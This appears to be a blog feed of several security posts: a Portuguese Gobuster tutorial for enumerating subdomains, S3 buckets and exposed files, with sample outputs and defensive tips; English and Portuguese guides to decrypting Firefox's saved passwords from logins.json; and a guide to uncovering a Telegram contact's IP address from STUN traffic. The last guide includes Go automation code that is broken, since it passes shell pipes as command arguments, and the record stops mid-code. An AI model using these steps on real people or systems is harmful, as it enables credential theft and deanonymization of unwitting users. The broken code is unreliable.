Em primeiro lugar, é fundamental entender que o Amazon S3 é considerado uma "plataforma publicamente acessível". Isso significa que, com a URL e as permissões apropriadas, qualquer "bucket" pode ser acessado de qualquer lugar por meio de solicitações HTTP, semelhante ao que um navegador faz para acessar um site comum.

A acessibilidade de um "bucket" por meio de sua URL depende das medidas de segurança habilitadas ou não. No entanto, é importante destacar que o Amazon S3 não é um recurso escondido, disponível apenas após passar por várias camadas de autenticação. Pelo contrário, é um recurso que pode ser acessado por meio dos endpoints da AWS de qualquer lugar na web, o que representa o principal risco de segurança. Qualquer "bucket" S3 e seus dados associados têm o potencial de serem acessíveis.

No que diz respeito à segurança do Amazon S3, as verificações implementadas pelo serviço para autorizar o acesso a um recurso S3, seja um "bucket" ou um objeto, são robustas. O S3 avalia as permissões em nível de usuário, por meio de políticas de "bucket", listas de controle de acesso (ACLs) de "bucket" e ACLs de objeto. Essas camadas de segurança são essenciais para garantir que apenas usuários autorizados possam acessar e manipular os dados armazenados no S3.

Como encontrar buckets abertos da Amazon S3

Nos últimos anos, presenciamos incidentes alarmantes de vazamentos de dados em grandes empresas devido à exposição de "buckets" no Amazon S3. Se você quiser conferir uma lista dos vazamentos mais notórios, pode encontrá-la aqui. Através dessas falhas de segurança, uma ampla gama de informações confidenciais foi, inadvertidamente, tornada acessível ao público. Estamos falando de números de Seguro Social, fotos pessoais, registros de vendas, nomes de usuário e senhas, históricos médicos e relatórios de crédito, entre outras coisas.

Ferramentas de pesquisa de bucket S3

Se você está interessado em explorar "buckets" disponíveis publicamente no Amazon S3, é necessário utilizar uma ferramenta que execute testes para verificar a existência desses "buckets". Quando um nome de "bucket" não existe, o serviço retornará um código de erro chamado "NoSuchBucket". Felizmente, existem várias ferramentas disponíveis para essa finalidade.

Inicialmente, algumas das primeiras ferramentas de busca de "buckets" no S3 incluíam opções como o Bucket Lazy S3, bucket_finder, AWS Cred Scanner, sandcastle, Mass3, Dumpster Diver, S3 Bucket Finder, gobuster e S3Scanner. Essas ferramentas desempenharam um papel importante ao verificar palavras-chave nos nomes de "buckets" publicamente acessíveis, embora apresentassem algumas limitações. Os resultados muitas vezes incluíam "buckets" irrelevantes e exibiam apenas os primeiros mil arquivos de seu conteúdo.

O que é Gobuster

Desenvolvido na linguagem Go, o Gobuster é um scanner de alta performance que se revela uma ferramenta valiosa para localizar diretórios ocultos, URLs, subdomínios e buckets S3.

A pergunta que frequentemente surge é: "E quanto ao Ffuf?" Embora o Ffuf seja um web fuzzer notável, o Gobuster emerge como uma alternativa ainda mais veloz e versátil. Além disso, o Gobuster oferece suporte a extensões que ampliam suas funcionalidades, o que é um diferencial. O programa também é capaz de dimensionar suas operações com o uso de múltiplas threads e realizar varreduras paralelas para agilizar os resultados.

Agora, quanto à instalação do Gobuster, o processo é bastante simples. Se você estiver usando o Kali Linux ou o Parrot OS, o Gobuster já estará pré-instalado para você.

Se, por outro lado, você utiliza o Ubuntu ou um sistema baseado no Debian, é possível instalar o Gobuster com facilidade utilizando o apt:

Linux

apt install gobuster

MacOs

brew install gobuster

Após concluir a instalação, será necessário contar com uma lista de palavras. Essa lista pode englobar senhas, nomes de usuário, subdomínios e assim por diante. Existem várias fontes onde você pode obter listas de palavras úteis.

Minha recomendação é utilizar o Seclists. O Seclists é um repositório abrangente de diversas listas usadas em avaliações de segurança. Isso inclui coleções de nomes de usuário, senhas, URLs, e muito mais. Se você estiver utilizando o Kali Linux, pode encontrar o Seclists no diretório /usr/share/wordlists.

Para experimentar o Gobuster em tempo real, você tem a opção de usar seu próprio site como alvo ou, de forma prática, empregar um aplicativo da web chamado Damn Vulnerable Web Application (DVWA). O DVWA é uma aplicação da web propositadamente mal configurada, criada para ser vulnerável de forma intencional. É uma ferramenta frequentemente utilizada por profissionais de testes de penetração para praticar e aprimorar suas habilidades em ataques a aplicações web.

Módulo DNS

O DNS, que significa Sistema de Nomes de Domínio, é um pilar da Internet que converte nomes de domínio fáceis de entender para endereços IP, que são usados por computadores para identificar recursos na rede. Ele age como uma espécie de "catálogo telefônico" da Internet, permitindo que navegadores e aplicativos localizem servidores e sites correspondentes aos nomes de domínio inseridos pelos usuários. O DNS desempenha um papel crucial na facilitação da navegação na web e na comunicação online.

O modo DNS é empregado para descobrir subdomínios ocultos dentro de um domínio-alvo. Por exemplo, se você possui um domínio chamado meudomínio.com, é possível utilizar o Gobuster para encontrar subdomínios como admin.meudominio.com, suporte.meudominio.com e assim por diante.

┌──(higordiego㉿host)-[~]
└─$ gobuster dns -h
Uses DNS subdomain enumeration mode

Usage:
  gobuster dns [flags]

Flags:
  -d, --domain string      The target domain
  -h, --help               help for dns
      --no-fqdn            Do not automatically add a trailing dot to the domain, so the resolver uses the DNS search domain
  -r, --resolver string    Use custom DNS server (format server.com or server.com:port)
  -c, --show-cname         Show CNAME records (cannot be used with '-i' option)
  -i, --show-ips           Show IP addresses
      --timeout duration   DNS resolver timeout (default 1s)
      --wildcard           Force continued operation when wildcard found

Global Flags:
      --debug                 Enable debug output
      --delay duration        Time each thread waits between requests (e.g. 1500ms)
      --no-color              Disable color output
      --no-error              Don't display errors
  -z, --no-progress           Don't display progress
  -o, --output string         Output file to write results to (defaults to stdout)
  -p, --pattern string        File containing replacement patterns
  -q, --quiet                 Don't print the banner and other noise
  -t, --threads int           Number of concurrent threads (default 10)
  -v, --verbose               Verbose output (errors)
  -w, --wordlist string       Path to the wordlist. Set to - to use STDIN.
      --wordlist-offset int   Resume from a given position in the wordlist (defaults to 0)

Iremos executar uma enumeração de dns, você pode executar com o seguinte comando:

┌──(higordiego㉿host)-[~]
└─$ gobuster dns -d test.io -w /usr/share/wordlists/dirb/common.txt 

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     test.io
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/wordlists/dirb/common.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Found: api.test.io

Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Módulo AWS S3

O Amazon S3 é amplamente adotado por um grande número de empresas para distribuir conteúdo, abrangendo desde material público, como imagens de sites, até arquivos privados e confidenciais.

Agora, vamos explorar o comando de ajuda para identificar os diversos parâmetros oferecidos pelo Gobuster em seu modo S3.


┌──(higordiego㉿host)-[~]
└─$ gobuster s3 -h                                                                                           
Uses aws bucket enumeration mode

Usage:
  gobuster s3 [flags]

Flags:
      --client-cert-p12 string            a p12 file to use for options TLS client certificates
      --client-cert-p12-password string   the password to the p12 file
      --client-cert-pem string            public key in PEM format for optional TLS client certificates
      --client-cert-pem-key string        private key in PEM format for optional TLS client certificates (this key needs to have no password)
  -h, --help                              help for s3
  -m, --maxfiles int                      max files to list when listing buckets (only shown in verbose mode) (default 5)
  -k, --no-tls-validation                 Skip TLS certificate verification
      --proxy string                      Proxy to use for requests [http(s)://host:port] or [socks5://host:port]
      --random-agent                      Use a random User-Agent string
      --retry                             Should retry on request timeout
      --retry-attempts int                Times to retry on request timeout (default 3)
      --timeout duration                  HTTP Timeout (default 10s)
  -a, --useragent string                  Set the User-Agent string (default "gobuster/3.6")

Global Flags:
      --debug                 Enable debug output
      --delay duration        Time each thread waits between requests (e.g. 1500ms)
      --no-color              Disable color output
      --no-error              Don't display errors
  -z, --no-progress           Don't display progress
  -o, --output string         Output file to write results to (defaults to stdout)
  -p, --pattern string        File containing replacement patterns
  -q, --quiet                 Don't print the banner and other noise
  -t, --threads int           Number of concurrent threads (default 10)
  -v, --verbose               Verbose output (errors)
  -w, --wordlist string       Path to the wordlist. Set to - to use STDIN.
      --wordlist-offset int   Resume from a given position in the wordlist (defaults to 0)

Vamos criar um arquivo chamado 'bucket_list.txt' e adicionar uma lista de nomes que podem ser usados como nomes de buckets no Amazon S3. Após a criação do arquivo, seguiremos adiante com a execução do comando a seguir.

┌──(higordiego㉿host)-[~]
└─$ gobuster s3 -w bucket_list.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Threads:                 10
[+] Wordlist:                bucket_list.txt
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
[+] Maximum files to list:   5
===============================================================
Starting gobuster in S3 bucket enumeration mode
===============================================================
[ERROR] Get "https://dev.app.test.io.com.br.s3.amazonaws.com/?max-keys=5": tls: failed to verify certificate: x509: certificate is valid for *.s3.amazonaws.com, s3.amazonaws.com, not dev.app.test.io.com.br.s3.amazonaws.com
[ERROR] Get "https://beta.test.io.com.br.s3.amazonaws.com/?max-keys=5": tls: failed to verify certificate: x509: certificate is valid for *.s3.amazonaws.com, s3.amazonaws.com, not beta.test.io.com.br.s3.amazonaws.com
[ERROR] Get "https://echo.test.io.s3.amazonaws.com/?max-keys=5": tls: failed to verify certificate: x509: certificate is valid for *.s3.amazonaws.com, s3.amazonaws.com, not echo.test.io.s3.amazonaws.com
[ERROR] Get "https://test.io.com.br.s3.amazonaws.com/?max-keys=5": tls: failed to verify certificate: x509: certificate is valid for *.s3.amazonaws.com, s3.amazonaws.com, not test.io.com.br.s3.amazonaws.com
[ERROR] Get "https://test.com.br.s3.amazonaws.com/?max-keys=5": tls: failed to verify certificate: x509: certificate is valid for *.s3.amazonaws.com, s3.amazonaws.com, not test.com.br.s3.amazonaws.com
[ERROR] Get "https://app.test.io.com.br.s3.amazonaws.com/?max-keys=5": tls: failed to verify certificate: x509: certificate is valid for *.s3.amazonaws.com, s3.amazonaws.com, not app.test.io.com.br.s3.amazonaws.com

http://prod_test.s3.amazonaws.com/

http://test-images.s3.amazonaws.com/

Progress: 8 / 9 (88.89%)
===============================================================
Finished
===============================================================

Módulo de Diretório

A função de exploração de diretórios no Gobuster desempenha um papel fundamental na busca por arquivos ocultos e caminhos de URL. Isso engloba uma ampla variedade de recursos, abrangendo desde imagens e arquivos de script até praticamente qualquer tipo de arquivo disponível na Internet.

Segue abaixo o comando para buscar o módulo dir no dns achado no passo anterior.

┌──(higordiego㉿host)-[~/Documentos/artigo-s3]
└─$ gobuster dir -w files_list.txt  -u http://test-images.s3.amazonaws.com/ 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://test-images.s3.amazonaws.com/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                files_list.txt
[+] Negative Status codes:   404
[+] Exclude Length:          243
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================

/image/b26086426c7e483b2924e775485b3215.jpg (Status: 200) [Size: 629968]
/image/contrato.jpg   (Status: 200) [Size: 2830252]

===============================================================
Finished
===============================================================

Como posso evitar ataque de enumeração com o Gobuster ?

Se você está preocupado com a segurança do Amazon S3 e deseja evitar a enumeração de buckets, aqui estão algumas medidas que você pode adotar:

Controle de Acesso: Utilize políticas de controle de acesso e permissões estritas no Amazon S3 para garantir que apenas as pessoas autorizadas possam listar, acessar ou modi
Monitore Atividades: Implemente a monitorização de atividades em seu Amazon S3 para detectar tentativas de acesso não autorizado ou enumeração de buckets.
Restrinja o Acesso por Referência: Utilize referenciamento condicional para restringir o acesso ao bucket com base no cabeçalho "Referer" da solicitação HTTP.
Bloqueie Acesso a Diretórios: Configure os diretórios dentro do bucket de forma a não permitir listagem, o que dificulta a enumeração de subdiretórios.
Proteja Suas Credenciais: Mantenha suas credenciais seguras e evite compartilhá-las de maneira inadequada.
Realize Auditorias Regulares: Realize auditorias regulares em sua configuração do Amazon S3 para garantir que suas medidas de segurança estejam atualizadas e eficazes.
Use soluções de proteção contra bots: serviços de proteção contra bots como o Cloudflare impedirão qualquer ataque de força bruta, tornando incrivelmente difícil atacar seu aplicativo web.

Conclusão

Lembre-se de que a segurança do Amazon S3 é crucial, pois o acesso não autorizado aos seus buckets pode levar a vazamentos de dados e outras vulnerabilidades.

Certifique-se de seguir as melhores práticas de segurança da AWS para proteger adequadamente seus recursos no S3.

Referências

Cracking Firefox Encryption and Rescuing Saved Passwords!

Higor Diego — Sun, 23 Jul 2023 18:45:05 +0000

Who hasn’t taken advantage of that amazing browser feature to save time and avoid the stress of remembering passwords for various websites where we’re registered? With so many different profiles to manage nowadays, this convenience has become a real lifesaver!

However, it’s natural to have some doubts about the security of this process since we’re entrusting sensitive information to the hands of the browser. But don’t worry, together we’ll unravel how Firefox handles this crucial aspect.

In this article, we’ll dive deeper into how Firefox works and how it stores our passwords. Is this practice really secure? We’ll better understand how our data is treated and, in turn, feel more at ease using this browser convenience.

Finding the Storage Location

In this section, we’ll discover where the folder that stores Firefox data is located in your default profile. This location may vary depending on your platform. Check out the paths below:

Windows:



C:/Users/<username>/AppData/Roaming/Mozilla/Firefox

Mac OS:



~/Library/Application Support/Firefox

Linux:



~/.mozilla/firefox

When running on your computer, remember to replace with your machine’s username. This information will be useful for the password recovery process, which we’ll explore in detail later.

Now, once inside the specific folder, we’ll list the contents to identify the important file for our action:



└─$ cd cwprco4r.default-esr && ls -lah 
...
-rw-r--r--  1 higor higor 2,5K jul 22 09:30 logins.json
...

Above, we have the important file for our action. The rest of the files in this folder are not relevant to the purpose of this article.

By executing a read command like cat logins.json, we will get the following output:



{
  "nextId": 3,
  "logins": [
    {
      "id": 1,
      "hostname": "chrome://FirefoxAccounts",
      "httpRealm": "Firefox Accounts credentials",
      "formSubmitURL": null,
      "usernameField": "",
      "passwordField": "",
      "encryptedUsername": "MEIEEPgAAAAAAAAAAAAAAAAAAAEwFAYJITKoZIhvcNabAwcE7x8cECOMFrk7xgPbEBBjqYBBzCDYxqHeHziM1jV/M7lzxfYpY3os=",
      "encryptedPassword": "MIIDdAQQ+AAAAAAAAAAAAAAAAAAAATAUBggqhkiG9w0gc2aae45DBwQISyY0ItSG+VQEgat1gNIkM7/xitAyu7BaD8YvkZ3GUfbfsUxGkTJyZwKFyQVjnwVlBgUmrC84lSycKkzdoeDsX2VFQoka90izrJ7gwxSlCbXX8DotPYjNGZEjIOKuODsxbXHEen7m/UIh0UqkKKtkQeU9OxG3vViGrPJgZs2kLpJtpX3YEVGbgHig6orJtZtjfkSfB2CTpaSsGDHJBsKwFt1wUYOp8NdQPndrRcTZ3kF9if93rDhfxlgkpePGYYl3NkgQIu6jJ76hOLYeEh0Mm7mCIHa/jiKwUHtU6xVxc3OMX0BY/E0jCeN6NMuxC44HgPhjkKqMGaKBNxp/SdMO7a2L3dPw0pndkKhx5XweylFU4KBcrRJSWzAPbHsRQ5gOg4umn6R+idKJpp3UbBovlte4fWOJyk+2hSLabKdHvOX82D5Hbg03ThOI62uXyVsAqmAxgLUsIAh9kRxA2MyfwnD5OVF4lBCQzEmPVTGfs8mi196WxYXJekC2Bn4ARH1rZlJo7c6bsGBcw5dRx5QqGmOrYYhSUr1+B9onLV+Ja1n+G8dNXGq3803+nSAcLZOBzq3YxB0+dJ/o4S9M+jNZChnDiJ3LF2JXIqKY5MnIw7sFrI0y1YTvEUWeVrGAGh3vDqBVOtlznx7G4VdX92nGjwuHDfH07QDXplVYbjthIvRN6Ykm+MLGoTY84kWuGkqpczeXtUQp3P5/JziUVCePdoaJhwU4JATpNXy25PNcgprW2SFQ4L/jCJ3L9JL9P+XRSZ3nVzDqm+xVLqWQVmda1fDWAAkmRmzPaDF+M5hXTM4NVJy8DbLrQislKsBWcw1GUCZNe0ja4019vXkUqV0LhAa7EnoidgoxBPVCUw0/37/2lAGURMdo5Q6dujWtku6fMhlsr7SVtVTaxnK9jZnkhqb2H8qhW4aoajHeym9EpKYKsqlraragGT8Cn7NmQs7BTicEQwvOYP+oUEFAcXYIX1yE/3zmQSH29QfkeobX1PcwaIRuct6hf8IG13TjOQe/K5k6UJep9XTEpUpfW7dWcipRLnXKXK+pSBwpj1WYHpYG7+qdSmf/85YiexedTWk5px/9DyH1RlqH7UT4Uern4ynEOBJcys9InNFGRiBhvQtvXclBanP",
      "guid": "{a2eb5150-685d-4615-a254-1c5dd58bee56}",
      "encType": 1,
      "timeCreated": 1689961688625,
      "timeLastUsed": 1689961688625,
      "timePasswordChanged": 1689961698732,
      "timesUsed": 1
    },
    {
      "id": 2,
      "hostname": "https://example.website.net",
      "httpRealm": null,
      "formSubmitURL": "https://example.website.net",
      "usernameField": "EmailAddress",
      "passwordField": "Password",
      "encryptedUsername": "MEIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcE7x8cECOMFrk7xgPbEBBjqYBBzCDYxqHeHziM1jV/M7lzxfYpY3os=",
      "encryptedPassword": "MFIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcvcrBCiECFZc/kfDKvcrBCinGLow37uiKmg7K83IUGntneBODTMeV1jMrg95p3sCQzSknnBdG2ef",
      "guid": "{f0459b50-b0fe-4512-a085-e94e72319579}",
      "encType": 1,
      "timeCreated": 1687392175539,
      "timeLastUsed": 1689971142811,
      "timePasswordChanged": 1687392175539,
      "timesUsed": 2
    }
  ],
  "potentiallyVulnerablePasswords": [],
  "dismissedBreachAlertsByLoginGUID": {},
  "version": 3,
  "sync": {
    "lastSync": 1689961704.49,
    "syncID": "MDoEEPgAAoZIhvcNAwAAAAAAAAAAA03210x,mmmAAAAAoZIhvcNAwEwFAYIKoZIhvcNAwcECD42iieWPdOhBBAjVsIqtcbz7b/ttYPhb2D0ZI63"
  }
}

This file contains the information needed to recover the passwords saved in the browser.

Identification of Encryption and Security Library

To ensure security, the username and password are encrypted using a cryptographic standard called PKCS #11 (Public-Key Cryptography Standards #11). This standard defines a standard interface for accessing cryptographic devices, such as smart cards and USB tokens, making cryptographic operations secure and protecting sensitive information.

Firefox adopts this standard through the NSS library, which has different names depending on the operating system:

Windows:



nss3.dll

Mac OS X El Capitan:



libnss3.dylib

Linux:



libnss3.so

These libraries are essential for the password decryption process.

Decrypting the Passwords

Now, let’s move on to the decryption step! To do this, we need to follow these steps:

Clone the repository containing the code required for decryption:



git clone git@github.com:unode/firefox_decrypt.git

Run the code, providing the path to the folder containing the Firefox files:



python firefoxy_decrypt.py /home/higor/.mozilla/firefox/cwprco4r.default-esr

The expected result will be the display of the saved passwords’ information:



Website:   https://example.website.net

Username: 'higor@gmail.com'

Password: 'teste#123'

Conclusion

Saving passwords in the browser can be extremely convenient, saving time and effort when accessing our accounts. However, it’s essential to be cautious and follow good security practices. Avoid using public computers to access important accounts and never share your passwords with others.

I hope this article has been useful and informative!

Keep following us for more content on technology, cybersecurity, and other interesting subjects.

Until next time!

References

https://medium.com/geekculture/how-to-hack-firefox-passwords-with-python-a394abf18016

Desvendando a criptografia do Firefox e resgatando senhas salvas!

Higor Diego — Sat, 22 Jul 2023 21:56:41 +0000

Quem nunca aproveitou aquela funcionalidade incrível do navegador para economizar tempo e evitar o estresse de lembrar todas as senhas dos diversos sites em que estamos cadastrados? Com tantos perfis diferentes para gerenciar atualmente, essa comodidade se tornou uma verdadeira mão na roda!

No entanto, é normal que surjam algumas dúvidas sobre a segurança desse processo, afinal, estamos confiando informações sensíveis nas mãos do navegador. Mas não se preocupe, vamos desvendar juntos como o Firefox lida com esse aspecto tão importante.

Neste artigo, mergulharemos mais fundo no funcionamento do Firefox e como ele armazena nossas senhas. Será que essa prática é realmente segura? Vamos entender melhor como nossos dados são tratados e, assim, nos sentirmos mais tranquilos ao utilizar essa comodidade do navegador.

Encontrando o local de armazenamento

Nesta seção, vamos descobrir onde fica a pasta que armazena os dados do Firefox no seu perfil padrão. Esse local pode variar dependendo da sua plataforma. Confira abaixo os caminhos:

Windows:

C:/Users/<username>/AppData/Roaming/Mozilla/Firefox

Mac OS X El Capitan:

~/Library/Application Support/Firefox

Linux:

~/.mozilla/firefox

Ao executar em seu computador, lembre-se de substituir pelo nome de usuário da sua máquina. Essas informações serão úteis para o processo de recuperação das senhas, que veremos em detalhes adiante.

Agora, entrando na pasta específica, iremos listar os conteúdos para identificar o arquivo importante para a nossa ação:

└─$ cd cwprco4r.default-esr && ls -lah 
...
-rw-r--r--  1 higor higor 2,5K jul 22 09:30 logins.json
...

Acima temos o arquivo importante para nossa ação o restante dos arquivos que contêm nessa pasta não são importantes para ação desse artigo.

Realizando um comando de leitura como cat logins.json, iremos ter a seguinte a saída.

{
  "nextId": 3,
  "logins": [
    {
      "id": 1,
      "hostname": "chrome://FirefoxAccounts",
      "httpRealm": "Firefox Accounts credentials",
      "formSubmitURL": null,
      "usernameField": "",
      "passwordField": "",
      "encryptedUsername": "MEIEEPgAAAAAAAAAAAAAAAAAAAEwFAYJITKoZIhvcNabAwcE7x8cECOMFrk7xgPbEBBjqYBBzCDYxqHeHziM1jV/M7lzxfYpY3os=",
      "encryptedPassword": "MIIDdAQQ+AAAAAAAAAAAAAAAAAAAATAUBggqhkiG9w0gc2aae45DBwQISyY0ItSG+VQEgat1gNIkM7/xitAyu7BaD8YvkZ3GUfbfsUxGkTJyZwKFyQVjnwVlBgUmrC84lSycKkzdoeDsX2VFQoka90izrJ7gwxSlCbXX8DotPYjNGZEjIOKuODsxbXHEen7m/UIh0UqkKKtkQeU9OxG3vViGrPJgZs2kLpJtpX3YEVGbgHig6orJtZtjfkSfB2CTpaSsGDHJBsKwFt1wUYOp8NdQPndrRcTZ3kF9if93rDhfxlgkpePGYYl3NkgQIu6jJ76hOLYeEh0Mm7mCIHa/jiKwUHtU6xVxc3OMX0BY/E0jCeN6NMuxC44HgPhjkKqMGaKBNxp/SdMO7a2L3dPw0pndkKhx5XweylFU4KBcrRJSWzAPbHsRQ5gOg4umn6R+idKJpp3UbBovlte4fWOJyk+2hSLabKdHvOX82D5Hbg03ThOI62uXyVsAqmAxgLUsIAh9kRxA2MyfwnD5OVF4lBCQzEmPVTGfs8mi196WxYXJekC2Bn4ARH1rZlJo7c6bsGBcw5dRx5QqGmOrYYhSUr1+B9onLV+Ja1n+G8dNXGq3803+nSAcLZOBzq3YxB0+dJ/o4S9M+jNZChnDiJ3LF2JXIqKY5MnIw7sFrI0y1YTvEUWeVrGAGh3vDqBVOtlznx7G4VdX92nGjwuHDfH07QDXplVYbjthIvRN6Ykm+MLGoTY84kWuGkqpczeXtUQp3P5/JziUVCePdoaJhwU4JATpNXy25PNcgprW2SFQ4L/jCJ3L9JL9P+XRSZ3nVzDqm+xVLqWQVmda1fDWAAkmRmzPaDF+M5hXTM4NVJy8DbLrQislKsBWcw1GUCZNe0ja4019vXkUqV0LhAa7EnoidgoxBPVCUw0/37/2lAGURMdo5Q6dujWtku6fMhlsr7SVtVTaxnK9jZnkhqb2H8qhW4aoajHeym9EpKYKsqlraragGT8Cn7NmQs7BTicEQwvOYP+oUEFAcXYIX1yE/3zmQSH29QfkeobX1PcwaIRuct6hf8IG13TjOQe/K5k6UJep9XTEpUpfW7dWcipRLnXKXK+pSBwpj1WYHpYG7+qdSmf/85YiexedTWk5px/9DyH1RlqH7UT4Uern4ynEOBJcys9InNFGRiBhvQtvXclBanP",
      "guid": "{a2eb5150-685d-4615-a254-1c5dd58bee56}",
      "encType": 1,
      "timeCreated": 1689961688625,
      "timeLastUsed": 1689961688625,
      "timePasswordChanged": 1689961698732,
      "timesUsed": 1
    },
    {
      "id": 2,
      "hostname": "https://example.website.net",
      "httpRealm": null,
      "formSubmitURL": "https://example.website.net",
      "usernameField": "EmailAddress",
      "passwordField": "Password",
      "encryptedUsername": "MEIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcE7x8cECOMFrk7xgPbEBBjqYBBzCDYxqHeHziM1jV/M7lzxfYpY3os=",
      "encryptedPassword": "MFIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcvcrBCiECFZc/kfDKvcrBCinGLow37uiKmg7K83IUGntneBODTMeV1jMrg95p3sCQzSknnBdG2ef",
      "guid": "{f0459b50-b0fe-4512-a085-e94e72319579}",
      "encType": 1,
      "timeCreated": 1687392175539,
      "timeLastUsed": 1689971142811,
      "timePasswordChanged": 1687392175539,
      "timesUsed": 2
    }
  ],
  "potentiallyVulnerablePasswords": [],
  "dismissedBreachAlertsByLoginGUID": {},
  "version": 3,
  "sync": {
    "lastSync": 1689961704.49,
    "syncID": "MDoEEPgAAoZIhvcNAwAAAAAAAAAAA03210x,mmmAAAAAoZIhvcNAwEwFAYIKoZIhvcNAwcECD42iieWPdOhBBAjVsIqtcbz7b/ttYPhb2D0ZI63"
  }
}

Esse arquivo contém as informações necessárias para recuperarmos as senhas salvas no navegador.

Identificação de criptografia e biblioteca de segurança

Para garantir a segurança, o nome de usuário e senha são criptografados usando um padrão de criptografia chamado PKCS #11 (Public-Key Cryptography Standards #11). Esse padrão define uma interface padrão para acessar dispositivos criptográficos, como cartões inteligentes e tokens USB, tornando as operações criptográficas seguras e protegendo informações sensíveis.

O Firefox adota esse padrão por meio da biblioteca NSS, que possui diferentes nomes dependendo do sistema operacional:

Windows:

nss3.dll

Mac OS X El Capitan:

libnss3.dylib

Linux:

libnss3.so

Essas bibliotecas são essenciais para o processo de descriptografia das senhas.

Descriptografando as Senhas

Agora, vamos ao passo de descriptografia! Para isso, precisamos seguir os seguintes passos:

Clone o repositório contendo o código necessário para a descriptografia:

git clone git@github.com:unode/firefox_decrypt.git

Execute o código, informando o caminho para a pasta que contém os arquivos do Firefox:

python firefoxy_decrypt.py /home/higor/.mozilla/firefox/cwprco4r.default-esr

O resultado esperado será a exibição das informações das senhas salvas no navegador:

Website:   https://example.website.net
Username: 'higor@gmail.com'
Password: 'teste#123'

Conclusão

Guardar senhas no navegador pode ser extremamente prático, economizando tempo e esforço na hora de acessar nossas contas. No entanto, é fundamental ser cuidadoso e seguir boas práticas de segurança. Evite usar computadores públicos para acessar contas importantes e nunca compartilhe suas senhas com terceiros.

Espero que este artigo tenha sido útil e informativo!

Continue nos acompanhando para mais conteúdos sobre tecnologia, segurança cibernética e outros assuntos interessantes.

Até a próxima!

Referências

https://medium.com/geekculture/how-to-hack-firefox-passwords-with-python-a394abf18016

How to discover the user’s IP address using Telegram.

Higor Diego — Thu, 08 Jun 2023 15:42:59 +0000

If you've ever wondered how messaging apps like Telegram and WhatsApp work behind the scenes of your conversations, this article is for you. We'll explore a method to discover the IP address of the user we're interacting with on Telegram, using the powerful network traffic analysis tool Wireshark.

Step 1: Downloading Wireshark

Before we begin, you need to download and install Wireshark on your computer. You can find the download on the official Wireshark website.

Make sure to choose the version that is compatible with your operating system.

Step 2: Filtering STUN Traffic

After opening Wireshark, you'll see an interface capturing real-time network traffic. Let's filter the STUN traffic, which is the protocol used by Telegram for communication.
In the filter bar, click on the search icon to open the search option. Then select the "String" option and type "XOR-MAPPED-ADDRESS" in the search line.

Step 3: Initiating Data Capture

Now, we're ready to start capturing data. Ensure Wireshark is running and make a call via Telegram to the user whose IP address you want to discover.
Once the user answers the call, Wireshark will start displaying the captured data. Look through the list for information related to the STUN protocol, and you'll find the IP address of the user who received the call.

Step 4: Identifying the IP Address

To easily identify the desired IP address, use the Wireshark search function. Click on the "Find" option and type "XOR-MAPPED-ADDRESS" in the search line. The user's IP address will immediately appear after that string.

Automating with Golang

Using the Golang programming language, we can automate the entire process described above. Below is a Golang code that performs this task efficiently and reliably:



package main

import (
    "fmt"
    "log"
    "os"
    "os/exec"
    "strings"
)

func main() {
    const CAP_PATH = "/tmp/tg_cap.pcap" // Temporary path for pcap capture file
    const CAP_TEXT = "/tmp/tg_text.txt" // Temporary path for text file with information
    const CAP_DURATION = "5"            // Capture duration in seconds

    // Get the external IP address of the device
    ipCmd := exec.Command("curl", "-s", "icanhazip.com")
    ipOutput, err := ipCmd.Output()
    if err != nil {
        log.Fatal("Failed to get IP address:", err)
    }
    MY_IP := strings.TrimSpace(string(ipOutput))

    // Check if Wireshark is installed
    _, err = exec.LookPath("tshark")
    if err != nil {
        log.Println("[-] Wireshark not found. Try installing Wireshark first.")
        log.Println("[+] Debian-based: sudo apt-get install -y tshark")
        log.Println("[+] RedHat-based: sudo yum install -y tshark")
        os.Exit(1)
    }

    fmt.Println("[+] Discovering User's IP Address on Telegram using Golang")
    fmt.Println("[+] Starting traffic capture. Please wait for", CAP_DURATION, "seconds...")

    // Start traffic capture with Wireshark
    captureCmd := exec.Command("tshark", "-w", CAP_PATH, "-a", "duration:"+CAP_DURATION)
    captureOutput, err := captureCmd.CombinedOutput()
    if err != nil {
        log.Fatal("Traffic capture error:", err)
    }

    fmt.Println("[+] Traffic captured.")

    // Convert pcap file to readable text file
    convertCmd := exec.Command("tshark", "-r", CAP_PATH)
    convertOutput, err := convertCmd.Output()
    if err != nil {
        log.Fatal("Error converting pcap file to text:", err)
    }

    err = os.WriteFile(CAP_TEXT, convertOutput, 0644)
    if err != nil {
        log.Fatal("Error writing text file:", err)
    }

    fmt.Println("[+] Pcap file successfully converted to text.")

    // Check if Telegram traffic is present in the text file
    if strings.Contains(string(convertOutput), "STUN 106") {
        fmt.Println("[+] Telegram traffic found.")

        // Extract the IP address from the text
        extractCmd := exec.Command("cat", CAP_TEXT, "|", "grep", "STUN 106", "|", "sed", "'s/^.*XOR-MAPPED-ADDRESS: //'", "|", "awk", "'{match($0,/[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+/); ip = substr($0,RSTART,RLENGTH); print ip}' | awk '!seen[$0]++'")
        extractOutput, err := extractCmd.Output()
        if err != nil {
            log.Fatal("Error extracting IP address:", err)
        }

        TG_OUT := strings.TrimSpace(string(extractOutput))
        IP_1 := strings.Fields(TG_OUT)[0]
        IP_2 := strings.Fields(TG_OUT)[1]

        var IP string

        // Check if the IP address is ours or the recipient's
        if MY_IP == IP_1 {
            IP = IP_2
        } else if MY_IP == IP_2 {
            IP = IP_1
        } else {
            IP = "[-] Sorry. IP address not found."
            os.Exit(1)
        }

        // Get host information for the IP address
